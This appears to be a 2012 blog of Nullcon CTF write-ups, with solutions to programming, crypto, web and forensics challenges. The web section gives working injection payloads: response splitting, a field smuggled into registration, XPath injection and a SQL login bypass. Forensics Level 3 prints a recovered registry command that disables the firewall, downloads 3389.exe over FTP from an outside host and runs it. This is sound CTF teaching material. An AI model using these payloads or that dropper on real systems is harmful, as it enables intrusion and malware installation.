Thursday, 19 January 2012

Nullcon 2012 CTF Programming Writeup

Level 1: ROTOMATA


Mfp ey zwvo fvat rjx hwprdrr lb nawzh tnfpc: Anj icvlu, hjgy Kbffhg, zk hjp gm nso nntjj, phf sw vawwhnwer, pcum nu oeq ewllxqmqit

Hint in the source: We only know the first 6 characters: "Men at"

It looks like every byte is shifted by its position in the string.

But there was still a trick: for the first 26 bytes the position is subtracted, for the next 26 it is added, and so on.


Flag: Men at some time are masters of their fates: The fault, dear Brutus, is not in our stars, but in ourselves, that we are underlings


Level 2: Pascal's Triangle


The Flag is the sum of all middle terms till first 1337 rows of Pascal's Triangle
Hint in the source: ex: The sum of all middle terms till first 6 rows is 9

After googling I found a formula here.


# Sum of the single middle term of every row with an odd number of entries
# (rows 0, 2, 4, ...), i.e. the central binomial coefficients C(2i, i),
# computed with the recurrence C(2i, i) = C(2i-2, i-1) * (4i - 2) / i.
total = 0
i = 0
while True:
    if i == 0:
        row = 1          # 1-based row number of the i-th even row
        last = 1         # C(0, 0)
    else:
        row = i * 2 + 1
        last = last * (4 * i - 2) // i
    if row > 1337:       # stop after the first 1337 rows
        break
    total += last
    i += 1
print(total)



Flag: 43659324741884237070936006832303643114239411987772786602066543431205872166674362332393596312576719064242547970040323267566530343333103970820072593578706234276624324605878186670972267056459871456566594569343564988621600326286475080697865518622537377534356455651048425097523734881838663157063304671110082383218294453737678744221560158357896856330703194356882895482874383651576271102847866170999680296497

Level 3: Your Brainfuck Sir ...


Debug bfcode to get the flag

File

The file is well-formed; I just added debug output at the end of every line by placing a ".".

And you get:
..In fact, never ever use gets() or sprintf(), period. If you do we willl send evil dwarfs after you.

You have to check for doubled output, like in "willl", and play with the dots at the beginning and end.

Flag: ...In fact, never ever use gets() or sprintf(), period. If you do we will send evil dwarfs after you..

Level 4: Substitute Problem


File

Flag: sedulously eschew obfuscatory hyperverbosity and prolixity 84 roedy green


Level 5: A pinch of salt for your coffee, Sir?


Link to the salted site

You can enter a password and you get md5(password + salt) back.

I entered 1 and got 3b3afa7da0ccd2cd1d5a9733369d6eae back.
Throw it into an MD5 hash cracker and you get back: 16541a8
The salt is: 6541a8




For corrections and other feedback send me an e-mail to bashrc at intruded dot net

Wednesday, 18 January 2012

Nullcon CTF 2012 Crypto Writeup

Level 1


Oexjwok -333 lauiljt bwxylexk hilyruik krbf lk yfi frzlx jekbeqaexi bwzqwxixy. ofiui yfi QB blx kixj lx iaibyueb kfwbs yfuwrgf yfi sitcwluj eh yfi frzlx jwik kwziyfexg yfly jwik xwy qailki Oexjwok, 2 Ceaa Glyik

The web source contains a link to a mirror

Mirror every key by looking at your keyboard:
q = p
a = l
z = m
. = ,
- = 2
3 = 0


WINDOWS 1999 ALREADY CONTAINS FEATURES SUCH AS THE HUMAN DISCIPLINE COMPONENT. WHERE THE PC CAN SEND AN ELECTRIC SHOCK THROUgH THE KEYBOARD IF THE HUMAN DOES SOMETHINg THAT DOES NOT PLEASE WINDOWS, 0 BILL gATES

Flag: Windows 2000 already contains features such as the human discipline component, where the PC can send an electric shock through the keyboard if the human does something that does not please Windows. - Bill Gates
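As an added example (not part of the original writeup), here is a decoder for this mirror cipher in Python. The writeup lists only a few pairs; the full key rows below, in particular the digit row "1234567890-=" that yields both 2<->- and 3<->0, are my assumption of the layout the challenge used.

```python
# Added example (not from the original writeup): decode the keyboard-mirror
# cipher of Crypto Level 1. The writeup lists only q=p, a=l, z=m, .=, -=2
# and 3=0; the full rows below are my assumption of the layout that produces
# those pairs (each row is mirrored around its centre).
ROWS = [
    "1234567890-=",   # gives 2<->- and 3<->0 as in the writeup
    "qwertyuiop",     # q<->p
    "asdfghjkl",      # a<->l, g maps to itself
    "zxcvbnm",        # z<->m, v maps to itself
    ",.",             # . <-> ,
]


def build_mirror_table():
    """Map every key to the key at the mirrored position of its row."""
    table = {}
    for row in ROWS:
        for ch, mirrored in zip(row, reversed(row)):
            table[ch] = mirrored
    return table


MIRROR = build_mirror_table()


def mirror_decode(text):
    """Apply the mirror map, keeping case; unknown characters pass through."""
    out = []
    for ch in text:
        low = ch.lower()
        if low in MIRROR:
            m = MIRROR[low]
            out.append(m.upper() if ch.isupper() else m)
        else:
            out.append(ch)
    return "".join(out)


# Ciphertext from the challenge, as quoted in the writeup.
CIPHERTEXT = ("Oexjwok -333 lauiljt bwxylexk hilyruik krbf lk yfi frzlx "
              "jekbeqaexi bwzqwxixy. ofiui yfi QB blx kixj lx iaibyueb kfwbs "
              "yfuwrgf yfi sitcwluj eh yfi frzlx jwik kwziyfexg yfly jwik xwy "
              "qailki Oexjwok, 2 Ceaa Glyik")

if __name__ == "__main__":
    print(mirror_decode(CIPHERTEXT))
```

The map is its own inverse, so the same function also turns the plaintext back into the ciphertext.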

Level2: White Noise


The file contains only tabs and spaces. Two symbols could be a code for binary?

Using \t = 0:
4572726F72204D6573736167653A20596F75722050617373776F7264204D757374204265206174204C65617374203138373730204368617261637465727320616E642043616E6E6F742052657065617420416E79206F6620596F75722050726576696F75732033303638392050617373776F726473202D204D53204B4220323736333034
Using \t = 1:
BA8D8D908DDFB29A8C8C9E989AC5DFA6908A8DDFAF9E8C8C88908D9BDFB28A8C8BDFBD9ADF9E8BDFB39A9E8C8BDFCEC7C8C8CFDFBC979E8D9E9C8B9A8D8CDF9E919BDFBC9E9191908BDFAD9A8F9A9E8BDFBE9186DF9099DFA6908A8DDFAF8D9A8996908A8CDFCCCFC9C7C6DFAF9E8C8C88908D9B8CDFD2DFB2ACDFB4BDDFCDC8C9CCCFCB

The first one looks like printable ASCII and decodes to the following, which is the flag.

Error Message: Your Password Must Be at Least 18770 Characters and Cannot Repeat Any of Your Previous 30689 Passwords - MS KB 276304
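An added example, not from the original writeup: a decoder that tries both bit assignments for a tab/space file and keeps the one that yields printable ASCII. The carrier is constructed inline by encoding the flag text, since the challenge file is not reproduced here.

```python
# Added example (not from the original writeup): decode a file that contains
# only tabs and spaces, as in Crypto Level 2. Both bit assignments are tried
# and the one that yields printable ASCII wins. The sample carrier is
# constructed here by encoding the flag text, so the block runs offline.

def whitespace_to_bytes(blob, tab_is_one):
    """Turn a tab/space string into bytes, 8 symbols per byte, MSB first."""
    bits = ""
    for ch in blob:
        if ch == "\t":
            bits += "1" if tab_is_one else "0"
        elif ch == " ":
            bits += "0" if tab_is_one else "1"
        # anything else (newlines etc.) is ignored
    bits = bits[: len(bits) - len(bits) % 8]
    return bytes(int(bits[i:i + 8], 2) for i in range(0, len(bits), 8))


def is_mostly_printable(data):
    """True when almost every byte is printable ASCII or plain whitespace."""
    if not data:
        return False
    printable = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return printable / len(data) > 0.95


def decode_whitespace(blob):
    """Return (polarity label, text) for the bit assignment that gives ASCII."""
    for tab_is_one in (False, True):
        candidate = whitespace_to_bytes(blob, tab_is_one)
        if is_mostly_printable(candidate):
            label = "\\t=1" if tab_is_one else "\\t=0"
            return (label, candidate.decode("ascii"))
    return (None, None)


def bytes_to_whitespace(data, tab_is_one=False):
    """Constructed encoder, used only to build the sample carrier below."""
    one, zero = ("\t", " ") if tab_is_one else (" ", "\t")
    return "".join(one if (b >> (7 - i)) & 1 else zero
                   for b in data for i in range(8))


# Constructed carrier: the flag text encoded with tab = 0, space = 1.
FLAG = ("Error Message: Your Password Must Be at Least 18770 Characters and "
        "Cannot Repeat Any of Your Previous 30689 Passwords - MS KB 276304")
SAMPLE = bytes_to_whitespace(FLAG.encode("ascii"), tab_is_one=False)

if __name__ == "__main__":
    print(decode_whitespace(SAMPLE))
```

With the wrong polarity every byte comes out with its bits inverted (the 0xBA8D8D90... dump above), so the printable-ratio check rejects it immediately.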

Level 3: The Base Test

Inside the HTML source you will find this string:

====5JP2T6UH5JR4UKRJSZTOEEJKN2TYUMFLXKUMFHJJTJVWULRIGSTGFCZKWZVEDJVJ====

It looks like A-Z plus 0-6, which could be anything above Base31.

RFC for Base encoding: http://tools.ietf.org/html/rfc4648
http://www.unitconversion.org/unit_converter/numbers-ex.html

http://tomeko.net/online_tools/base32.php?lang=en

Why does it have padding on both sides? After reversing the string to
JVJDEVZWKZCFGTSGIRLUWVJTJJHFMUKXLFMUYT2NKJEEOTZSJRKU4RJ5HU6T2PJ5
and base32 decoding it we get
MR2W6VDSNFDWKU3JNVQWYYLOMRHGO2LUNE======
After base32 decoding this as well, we get the flag:
duoTriGeSimalandNgiti

Level 4: Elucidate

File
Obfuscated PHP file with 3 stages.

Stage 1 eval'ed a base64-decoded PHP script.
Stage 2 had an if check that executed the following code:

gzinflate(base64_decode(str_rot13("...")));


Stage 3 had a zip routine, but it was not necessary to decrypt it.

$var1 = array("file1.jpg", "file2.jpg", "file3.gif");
create_zip($var1, "myzipfile.zip", true);


The flag was in an unused variable:

$_4fa3332ef3d19e9840387434b8d28780 = "\x6f\156\x6c\171\x62\171\x6f\142\x73\145\x72\166\x69\156\x67\164\x68\151\x73\143\x6f\156\x64\151\x74\151\x6f\156\x77\157\x75\154\x64\164\x68\145\x72\145\x73\165\x6c\164\x73\157\x66\157\x75\162\x77\157\x72\153\x62\145\x72\145\x67\141\x72\144\x65\144\x61\163\x66\165\x6c\154\x79\143\x6f\156\x63\154\x75\163\x69\166\x65\141\x6e\144\x61\163\x68\141\x76\151\x6e\147\x65\154\x75\143\x69\144\x61\164\x65\144\x74\150\x65\156\x6f\162\x6d\141\x6c\143\x6f\165\x72\163\x65\157\x66\164\x68\145\x70\150\x65\156\x6f\155\x65\156\x61";


Flag: onlybyobservingthisconditionwouldtheresultsofourworkberegardedasfullyconclusiveandashavingelucidatedthenormalcourseofthephenomena

Level 5: Llun Saving Bank


Llun Saving Bank is fed up with known encryption standards to store the data. They decided to reinvent the wheel. Can you decode the data?

Inside the HTML Source you will find:

Hs Foe vhmmhng un!qrdvdot!Ewhl!btu!nou!@ble> Thdn!id!hr NOU Omoipouenu/!Hs!Id!@ble- cuu!NNU vhllhof>!Thdn!Id!hr!Lamdvoldnu/ Hs Id Cnth @bme and!Vimliog> Tidn Vhdobe Bnldui Ewhl>!Ir hd!Neitidr!@cmd!Oor Villhnf>!Tidn!WHY!ball!him FOE? -!Dqhbtrusongnd



After decrypting it you get this text:
"Is God willing to prevent Evil but not Able? Then he is NOT Omnipotent. Is He Able, but NOT willing? Then He is Malevolent. Is He Both Able and Willing? Then Whence Cometh Evil? Is he Neither Able Nor Willing? Then WHY call him GOD? - Epicurusongod"


If you diff the characters you will see that the bytes differ by at most one (+1/0/-1).

It seems the last bit matters. So print out the last bit of every character of the encrypted text:
01001100011001010110000101110010011011100010000001101000011011110111011101110100011011110010000001001000011010010110010001100101001000000110100101101110001000000101000001101100011000010110100101101110001000000101001101101001011001110110100001110100

This decodes to the Flag: "Learn howto Hide in Plain Sight"
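An added example, not from the original writeup, of the scheme described above: hiding a message in the low bit of every character of a cover text, nudging each byte by at most 1, and recovering it the way the writeup does. The encoder is my constructed counterpart to the challenge; the cover sentence, the message and the bit string are the ones from this level.

```python
# Added example (not from the original writeup): the low-bit scheme of Crypto
# Level 5. Each cover character carries one message bit in its least
# significant bit and is nudged by at most +1/-1, so the cover stays readable
# (a space becomes "!" and "?" becomes ">", as in the challenge text).
# encode() is my constructed counterpart to the challenge; extract() is the
# recovery the writeup performs.

def text_to_bits(message):
    return "".join(format(b, "08b") for b in message.encode("ascii"))


def bits_to_text(bits):
    """Group a '0'/'1' string into bytes (MSB first) and decode as ASCII."""
    bits = bits[: len(bits) - len(bits) % 8]
    return bytes(int(bits[i:i + 8], 2)
                 for i in range(0, len(bits), 8)).decode("ascii")


def encode(cover, message):
    """Write one message bit into the LSB of each cover byte (+-1 at most)."""
    bits = text_to_bits(message)
    if len(bits) > len(cover):
        raise ValueError("cover text too short for the message")
    out = bytearray(cover.encode("ascii"))
    for i, bit in enumerate(bits):
        want = int(bit)
        if (out[i] & 1) != want:
            # even byte needing a 1: +1 sets the bit; odd byte needing a 0: -1 clears it
            out[i] += 1 if want else -1
    return out.decode("ascii")


def extract(stego, nbits=None):
    """Collect the LSB of every character; the message is the first nbits bits."""
    bits = "".join(str(b & 1) for b in stego.encode("ascii"))
    if nbits is not None:
        bits = bits[:nbits]
    return bits_to_text(bits)


def max_delta(cover, stego):
    """Largest per-byte change between cover and stego text."""
    return max(abs(a - b) for a, b in zip(cover.encode("ascii"),
                                           stego.encode("ascii")))


# Cover sentence and hidden message from this level (248 characters, 31 bytes).
COVER = ("Is God willing to prevent Evil but not Able? Then he is NOT "
         "Omnipotent. Is He Able, but NOT willing? Then He is Malevolent. "
         "Is He Both Able and Willing? Then Whence Cometh Evil? Is he Neither "
         "Able Nor Willing? Then WHY call him GOD? - Epicurusongod")
MESSAGE = "Learn howto Hide in Plain Sight"
# The bit string the writeup extracted from the challenge text.
WRITEUP_BITS = ("0100110001100101011000010111001001101110001000000110100001101111"
                "0111011101110100011011110010000001001000011010010110010001100101"
                "0010000001101001011011100010000001010000011011000110000101101001"
                "01101110001000000101001101101001011001110110100001110100")

if __name__ == "__main__":
    stego = encode(COVER, MESSAGE)
    print(stego)
    print(extract(stego, len(MESSAGE) * 8))
    print(bits_to_text(WRITEUP_BITS))
```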



Nullcon Ctf 2012 Web Writeup

Level 1


adding a will trigger a 503 error

The server just emulated the bug, so you had to guess the right solution string.

Solution:
/challenge/wlevel-1-proc.asp?input=password.asptest.txt

Level 2


Can you redirect ME to hackim.null.co.in?

My first idea was trying HTTP response splitting, but you won't get real feedback; I guess it's emulated again. In the end the following request did it:

GET /challenge/wlevel-2-proc.asp?page=%0d%0a%0aHTTP/1.1%20302%20Moved%20Temporarily%0d%0aLocation:%20http://hackim.null.co.in/

Level 3


Login System

Click here to Login
Click here to Register
Invalid Flag. Please try again.



Registration using
username=Admin125&name=admin&password=admin&email=admin%40somemail.com&Submit=Register
and we get
Debug Info: INSERT 'Admin125|admin|admin|admin@somemail.com|admin:no|comment:new user' INTO USER DB FILE

Changing it to:
username=Admin126&name=admin&password=admin&email=admin%40somemail.com|admin:yes&Submit=Register

Log in as Admin126 and you get:

Welcome! You are logged in as ADMIN!
Flag: b3149ecea4628efd23d2f86e5a723472


Level 4

Can You Get Me all the Data?

2007
2002

Check for XPath injection:
/challenge/wlevel-4-data.asp?input='%20or%20''='
We get 11 presidents of India.

Trying flag as the node name and identifying the length of the flag:
/challenge/wlevel-4-data.asp?input='%20orstring-length(//flag)=11%20and%20''='

Brute-force using:
/challenge/wlevel-4-data.asp?input='%20or%20substring(//flag,1,1)='W'%20and%20''='

We get "Web+Level+4", but this is not the solution.

So, trying to get all the data.
After some experiments, get the count of all entries:
/challenge/wlevel-4-data.asp?input=2002'%20and%20count(/*[1]/*[1]/*)=12%20and%20''='

11 presidents but 12 nodes?

Either you guess the node name or you brute-force the server with blind XPath attacks, like I did.

After searching for the node //value:

Flag: myworthinessisallmydoubthismeritallmyfearcontrastingwhichmyqualitydoeshoweverappear


Afterwards I got non-blind solutions from others:

1: '] //* | //* ['1' ='1
2: 2002']/parent::node()[position()='1

Web Level 5


Do You Have What IT Takes to Break into the World's Most Secure Login System?

SQL injection with reCAPTCHA?

If you insert ' OR ''=' you will be detected, so no spaces are allowed.

You can try '=' which should build a query like "where username=''=''" and this will be true.

In our case, inserting '!=' or '<>' in username and password passes the test:

username = '' != '' and password = '' != ''

Why does this work? The query is evaluated here from left to right:
username = '' is FALSE
FALSE != '' is TRUE

For SQLite: "Arithmetic, boolean, relational and bitwise operators are all left to right associated."

Flag: 47c1b025fa18ea96c33fbb6718688c0f
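Added example (not from the original writeup): the same condition reproduced against an in-memory SQLite table with a constructed schema, next to the parameterised query that is immune to it. In SQLite the `'='` variant alone does not match (an integer 0 is never equal to the text ''), which is why `'!='` is needed here.

```python
# Added example (not from the original writeup): reproduces the Web Level 5
# condition in SQLite and shows the fix. The table, rows and query shape are
# constructed here; the challenge's real schema is unknown.
import sqlite3


def make_db():
    """Constructed users table with two accounts."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("alice", "s3cret"), ("bob", "hunter2")])
    return db


def login_vulnerable(db, username, password):
    """String-concatenated query: the user input becomes part of the SQL."""
    sql = ("SELECT username FROM users WHERE username='%s' AND password='%s'"
           % (username, password))
    return [row[0] for row in db.execute(sql)]


def login_safe(db, username, password):
    """Parameterised query: the input can only ever be compared as a value."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return [row[0] for row in db.execute(sql, (username, password))]


if __name__ == "__main__":
    db = make_db()
    # '!=' turns the condition into  username=''!=''  which SQLite evaluates
    # left to right: (username='') is 0, and 0 != '' is true for every row.
    print(login_vulnerable(db, "'!='", "'!='"))   # every user
    print(login_safe(db, "'!='", "'!='"))         # nobody
```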





Nullcon CTF 2012 Forensic Writeup

Forensics Level 1: Tum Agar Dhyan Se Baat Meri Suno

While conducting the raid on a suspect the police found the system containing no suspicious information in the form of a code. While comparing various files they came up with a suspicious sound file and feel that the code is hidden inside the same.
You are asked to find out that code if hidden in the file.

File: JS.rar

song name

If you listen to it you will notice there are some quiet parts. I opened it in Audacity and looked for the silent parts, removed everything else and played it again. It sounded like a reversed voice. So I reversed the whole audio using Audacity and heard some numbers, which are the flag.

Flag: 12344346765

Forensics Level 2: Andar Ch0r

A company Mil Baat Ke Khao Ltd suspects that one of its employees is sending the internal codes secretly outside the organisation. The company sniffed the data being sent and reconstructed it to find that a word document was being sent.
The company strongly suspects that there is some hidden passport code in the document.
You as a forensic investigator are provided with the copy of that file and are required to find out the hidden code. The code has to be in whole number.

A Word file was given with an image containing this string:
446f20796f75207265616c6c79206665656c2074686174207468652061726368697465637420697320736f2064756d623f

which is hex-encoded ASCII for "Do you really feel that the architect is so dumb?"

If you run strings on it you will see some information:
Here is your Passport number to the new level
Hey Good Job doneK
I wonder if you need to fire up your brain even more to reach the new level
May be yes
May be no


It seems there is something else inside. Running foremost on it:
0:  00000000.ole    41 KB    0
1:  00000019.zip    18 KB    10130

$ unzip 00000019.zip
inflating: [Content_Types].xml
inflating: _rels/.rels
inflating: theme/theme/themeManager.xml
inflating: theme/theme/theme1.xml
inflating: theme/theme/_rels/themeManager.xml.rels

Nothing interesting inside.

Opening the OLE file as an XLS:
"Well done………… I guess you are on the correct path…….. Carry on"

After clicking on Format->Sheet->Unhide you can unhide the Nullcon2 sheet.
Hey Good Job done
I wonder if you need to fire up your brain even more to reach the new level
May be yes
May be no
I guess ………………………. What do I Say ;)


But this is not enough. What I did next: save the file in the xlsx format, unzip it and look into the XML files.
Opening xl/workbook.xml and changing
<sheet name="Nullcon3" sheetid="3" state="veryHidden" id="rId3"/>
to
<sheet name="Nullcon3" sheetid="3" state="hidden" id="rId3"/>

Saving it and compressing it into a new xlsx file:

$ zip -r myzip.xlsx *
adding: [Content_Types].xml (deflated 77%)
adding: _rels/ (stored 0%)
adding: _rels/.rels (deflated 60%)
adding: docProps/ (stored 0%)
adding: docProps/app.xml (deflated 53%)
adding: docProps/core.xml (deflated 49%)
adding: xl/ (stored 0%)
adding: xl/_rels/ (stored 0%)
adding: xl/_rels/workbook.xml.rels (deflated 76%)
adding: xl/calcChain.xml (deflated 16%)
adding: xl/sharedStrings.xml (deflated 43%)
adding: xl/styles.xml (deflated 55%)
adding: xl/theme/ (stored 0%)
adding: xl/theme/theme1.xml (deflated 80%)
adding: xl/workbook.xml (deflated 45%)
adding: xl/worksheets/ (stored 0%)
adding: xl/worksheets/sheet1.xml (deflated 46%)
adding: xl/worksheets/sheet2.xml (deflated 53%)
adding: xl/worksheets/sheet3.xml (deflated 61%)


Open it and unhide nullcon3 and you see the calculated value:
6924288.652

Be careful: you have to use "." as the decimal separator; it won't accept it with a ",".

Actually there was a faster way. Open the document in Excel, press ALT+F11 and you get the VBA project listing. Select Sheet3 and press F6 to get the Properties, then change the visibility to visible :) Thanks to king_aurther for pointing this out.


Forensics Level 3: Not Guilty!

An employee was suspected of using some malicious files. The employee asserts that he is not guilty cause he never used any program except microsoft word and excel.
While conducting the analysis nothing was found in the registry suggesting that something did run automatically. All locations that can run program automatically were examined and nothing malicious was found.
You as an investigator are provided with a piece of hive to carve out if anything was deleted from the hive and provide the exact "Value", "value type" and "data" deleted so that the employee gets the justice.

There are many tools on the Forensics Wiki.
$ reglookup-timeline software > timeline.txt
$ cat timeline.txt | awk '{print $1}' | sort | uniq
2007-08-09
2007-08-10
MTIME,FILE,PATH
$

$ reglookup-recover software
OFFSET,REC_LENGTH,REC_TYPE,PATH,NAME,NK_MTIME,NK_NVAL,VK_TYPE,VK_VALUE,VK_DATA_LEN,SK_OWNER,SK_GROUP,SK_SACL,SK_DACL,RAW_CELL
ERROR: Bad cell length encountered while parsing unallocated cells at offset 0x00A27908.
00B4EEA0,00000020,VALUE,,Shell,,,SZ,c:\x5Cwindows\x5Csystem32\x5Ccmd.exe /c net1 stop sharedaccess&echo open xxx.3322.org> cmd.txt&echo feng>> cmd.txt&echo xxx>> cmd.txt&echo binary >> cmd.txt&echo get 3389.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&3389.exe&3389.exe&del cmd.txt /q,490,,,,,


Value: Shell
Type: REG_SZ
Data: c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open xxx.3322.org> cmd.txt&echo feng>> cmd.txt&echo xxx>> cmd.txt&echo binary >> cmd.txt&echo get 3389.exe >> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&3389.exe&3389.exe&del cmd.txt /q


Forensics Level 4: Intriguing MBR


A suspected drive was found in bad shape. The data extraction was almost impossible and the final copy obtained carried only few bytes. The bytes belonged to the initial sectors and wherever the system could not read the space was filled with 0x00 so as to keep the offset of the data obtained intact.
The initial sector displayed a messy MBR data.
As a forensic investigator you are required to find the following information:
1) The number of partitions in the damaged drives
2) The start and end LBA for each partition
3) The Start and end of unpartitioned space between two clusters

The Drive showed to be a SATA drive with 512 bytes of LBA

File



But the numbers were wrong: I had divided the values by 512 to get the LBA, but the values inside were already LBA values, so I changed it to:
slba1=2048&elba1=98566144&ptype1=5&slba2=98568192&elba2=182454271&ptype2=12&slba3=182454272&elba3=203425791&ptype3=14&slba4=203425792&elba4=253757439&ptype4=23&slba5=253757440&elba5=310380543&ptype5=47&slba6=310380544&elba6=352323583&ptype6=48&slba7=352323584&elba7=406849535&ptype7=15&slba8=406849536&elba8=488397134&ptype8=5&slba9=98566145&elba9=98568191&ptype9=5&slba10=&elba10=&ptype10=0&slba11=&elba11=&ptype11=0&slba12=&elba12=&ptype12=0&slba13=&elba13=&ptype13=0&slba14=&elba14=&ptype14=0&slba15=&elba15=&ptype15=0&slba16=&elba16=&ptype16=0&slba17=&elba17=&ptype17=0&slba18=&elba18=&ptype18=0&slba19=&elba19=&ptype19=0&slba20=&elba20=&ptype20=0&Submit=Submit

I got a hint that the order matters, so the final solution was this POST request:
slba1=2048&elba1=98566144&ptype1=5&slba3=98568192&elba3=182454271&ptype3=12&slba4=182454272&elba4=203425791&ptype4=14&slba5=203425792&elba5=253757439&ptype5=23&slba6=253757440&elba6=310380543&ptype6=47&slba7=310380544&elba7=352323583&ptype7=48&slba8=352323584&elba8=406849535&ptype8=15&slba9=406849536&elba9=488397134&ptype9=5&slba2=98566145&elba2=98568191&ptype2=5&slba10=&elba10=&ptype10=0&slba11=&elba11=&ptype11=0&slba12=&elba12=&ptype12=0&slba13=&elba13=&ptype13=0&slba14=&elba14=&ptype14=0&slba15=&elba15=&ptype15=0&slba16=&elba16=&ptype16=0&slba17=&elba17=&ptype17=0&slba18=&elba18=&ptype18=0&slba19=&elba19=&ptype19=0&slba20=&elba20=&ptype20=0&Submit=Submit
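Added example, not from the original writeup: parsing the four primary entries of an MBR to answer the questions above (partition count, start/end LBA, unpartitioned gaps), reading the start-LBA and sector-count fields as LBAs rather than dividing by 512. The MBR image is constructed with made-up values; extended partitions (type 5/0x0F as in the challenge) would need the EBR chain followed, which this block does not do.

```python
# Added example (not from the original writeup): parse the four primary
# partition entries of an MBR and report start/end LBA and the unpartitioned
# gaps, the questions asked in Forensics Level 4. The start/size fields are
# already LBA sector numbers, so nothing is divided by 512. The MBR image is
# constructed here with made-up values; it is not the challenge file.
import struct

SECTOR = 512
ENTRY_FMT = "<B3sB3sII"   # status, CHS start, type, CHS end, start LBA, sectors


def parse_mbr(mbr):
    """Return a list of (index, type, start_lba, end_lba) for used entries."""
    if len(mbr) < SECTOR or mbr[510:512] != b"\x55\xaa":
        raise ValueError("not a valid MBR (bad length or signature)")
    parts = []
    for i in range(4):
        status, _, ptype, _, start, count = struct.unpack_from(
            ENTRY_FMT, mbr, 446 + 16 * i)
        if ptype == 0 or count == 0:
            continue          # empty slot
        parts.append((i + 1, ptype, start, start + count - 1))
    return parts


def unpartitioned_gaps(parts, total_sectors):
    """Inclusive sector ranges not covered by any partition, after sector 0."""
    gaps = []
    cursor = 1                # sector 0 holds the MBR itself
    for _, _, start, end in sorted(parts, key=lambda p: p[2]):
        if start > cursor:
            gaps.append((cursor, start - 1))
        cursor = max(cursor, end + 1)
    if cursor < total_sectors:
        gaps.append((cursor, total_sectors - 1))
    return gaps


def build_mbr(entries):
    """Constructed helper: entries are (type, start_lba, sectors)."""
    mbr = bytearray(SECTOR)
    for i, (ptype, start, count) in enumerate(entries):
        struct.pack_into(ENTRY_FMT, mbr, 446 + 16 * i,
                         0x80 if i == 0 else 0x00, b"\x00\x00\x00",
                         ptype, b"\x00\x00\x00", start, count)
    mbr[510:512] = b"\x55\xaa"
    return bytes(mbr)


# Constructed sample: three primaries with a hole between the 2nd and 3rd.
SAMPLE_MBR = build_mbr([(0x07, 2048, 204800),
                        (0x0C, 206848, 102400),
                        (0x83, 311296, 40960)])
TOTAL_SECTORS = 360000

if __name__ == "__main__":
    parts = parse_mbr(SAMPLE_MBR)
    for idx, ptype, start, end in parts:
        print("partition %d type 0x%02X: LBA %d-%d" % (idx, ptype, start, end))
    print("unpartitioned:", unpartitioned_gaps(parts, TOTAL_SECTORS))
```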

Forensics Level 5: Universal Swindlers Bayonet


Anusandhaanic Daakus Ltd. Is a company whose strength lies in the researches it conducts. Very often the employees leaving the organisation manage to carry the research data alongwith. This time company decided to go for the investigation and called upon a forensic investigator. This investigator captured the memory dump and shut the system down. On resuming the system he finds that the drive has been encrypted and is left with only the memory dump.
You as an investigator are required to find out the following information from the dump 1) Serial No. of external drive
2) Date and time (IST) when the drive was first connected
3)Date and time (IST) when the drive was last connected
4) Launching which other executable (Not nullcon.exe>) resulted in launching of nullcon.exe

File


https://www.volatilesystems.com/default/volatility
http://code.google.com/p/volatility/wiki/CommandReference

After playing Codegate I already knew that the storage information is kept in the registry, so we have to look for the registry entries.
http://www.forensicswiki.org/wiki/USB_History_Viewing

Check mounted devices first:
look for SYSTEM\MountedDevices
$ vol.py -f null.img printkey -K "MountedDevices"

REG_BINARY \??\Volume{f57881e4-37ca-11e1-8cf1-806d6172696f} : (S) CDROM
REG_BINARY \??\Volume{f57881e6-37ca-11e1-8cf1-806d6172696f} : (S)
REG_BINARY \DosDevices\D: : (S)
REG_BINARY \DosDevices\E: : (S) CDROM
REG_BINARY \??\Volume{f57881e8-37ca-11e1-8cf1-806d6172696f} : (S)
REG_BINARY \DosDevices\C: : (S)
REG_BINARY \??\Volume{9f9f94da-37a0-11e1-a8b1-001bb988bbdb} : (S)
REG_BINARY \DosDevices\F: : (S)


0xe101bad8 is the address of the SYSTEM hive from hivelist:
$ vol.py -f null.img hivedump -o 0xe101bad8 | grep -i usbstor
2012-01-05 13:24:36 \$PROTO.HIV\ControlSet001\Enum\USBSTOR
2012-01-05 13:24:36 \$PROTO.HIV\ControlSet001\Enum\USBSTOR\Disk&Ven_Seagate&Prod_FreeAgent_Go&Rev_0142
2012-01-06 12:22:13 \$PROTO.HIV\ControlSet001\Enum\USBSTOR\Disk&Ven_Seagate&Prod_FreeAgent_Go&Rev_0142\2GEL32TN&0
2012-01-05 13:24:39 \$PROTO.HIV\ControlSet001\Enum\USBSTOR\Disk&Ven_Seagate&Prod_FreeAgent_Go&Rev_0142\2GEL32TN&0\Device Parameters
2012-01-05 13:24:36 \$PROTO.HIV\ControlSet001\Enum\USBSTOR\Disk&Ven_Seagate&Prod_FreeAgent_Go&Rev_0142\2GEL32TN&0\LogConf


$ vol.py -f null.img printkey -K "ControlSet001\Enum\USBSTOR\Disk&Ven_Seagate&Prod_FreeAgent_Go&Rev_0142"

Last updated: 2012-01-05 13:24:36
Converted to IST: 2012-01-05 18:54:36

$ vol.py -f null.img printkey -K "ControlSet001\Enum\USBSTOR\Disk&Ven_Seagate&Prod_FreeAgent_Go&Rev_0142\2GEL32TN&0"

Last updated: 2012-01-06 12:22:13
Converted to IST: 2012-01-06 17:52:13

Subkeys:
(S) Device Parameters
(S) LogConf

Values:
REG_SZ DeviceDesc : (S) Disk drive
REG_DWORD Capabilities : (S) 16
REG_DWORD UINumber : (S) 0
REG_MULTI_SZ HardwareID : (S) ['USBSTOR\\DiskSeagate_FreeAgent_Go____0142', 'USBSTOR\\DiskSeagate_FreeAgent_Go____', 'USBSTOR\\DiskSeagate_', 'USBSTOR\\Seagate_FreeAgent_Go____0', 'Seagate_FreeAgent_Go____0', 'USBSTOR\\GenDisk', 'GenDisk', '', '']
REG_MULTI_SZ CompatibleIDs : (S) ['USBSTOR\\Disk', 'USBSTOR\\RAW', '', '']
REG_SZ ClassGUID : (S) {4D36E967-E325-11CE-BFC1-08002BE10318}
REG_SZ Service : (S) disk
REG_DWORD ConfigFlags : (S) 0
REG_SZ Driver : (S) {4D36E967-E325-11CE-BFC1-08002BE10318}\0001
REG_SZ Class : (S) DiskDrive
REG_SZ Mfg : (S) (Standard disk drives)
